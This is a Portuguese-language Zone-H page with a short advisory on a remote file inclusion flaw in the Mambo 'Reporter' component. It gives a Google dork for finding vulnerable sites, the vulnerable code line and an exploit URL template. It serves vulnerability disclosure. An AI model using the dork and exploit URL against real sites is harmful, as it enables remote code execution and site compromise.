Zone-H
Home arrow Avisos de Segurança arrow Mambo Componente Reporter: Inclusão de arquivos remotos
10 de setembro de 2010
 
 
Ataques desta semana
O.S.  Defs.  %
Linux  9426  73.55%
Win 2003  2812  21.94%
FreeBSD  270  2.11%
Unknown  139  1.08%
Win 2008  106  0.83%
Other  63  0.49%

Total de ataques: 12816 dos quais 947 único(s) no ip e 11869 invasão(ões) em massa

Menu Principal
Home
Guerra Digital
Geopolítica
Notícias ITsec
Avisos de Segurança
Test Drive
360°
Sites atacados
Eventos do Zone-H
Fórum
Publicações
Zone-H Amigos/Parceiros
Contate-nos
Sobre este Site
Membros do Zone-H BR
Favoritos geral
Zone-H.org
Área de download
Mambo Componente Reporter: Inclusão de arquivos remotos Imprimir E-mail
Avaliação do Usuário: / 1
PiorMelhor 
Por Marcelo Almeida (Vympel)   
17 de agosto de 2006
Autor: Crackers_Child
cont_at_ct: crackers_child_at_sibersavascilar.com
Google Dorks : inurl:"/com_reporter/"

Bug İ
reporter.sql.php
require_once($mosConfig_absolute_path.'/components/com_reporter/view/'.$view_class.'.view.php');
$page = new ResultView($result);
Exploit: http://[target]/[mambo_path]/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=
Aviso original
 
< Anterior   Próximo >
 
Top! Top!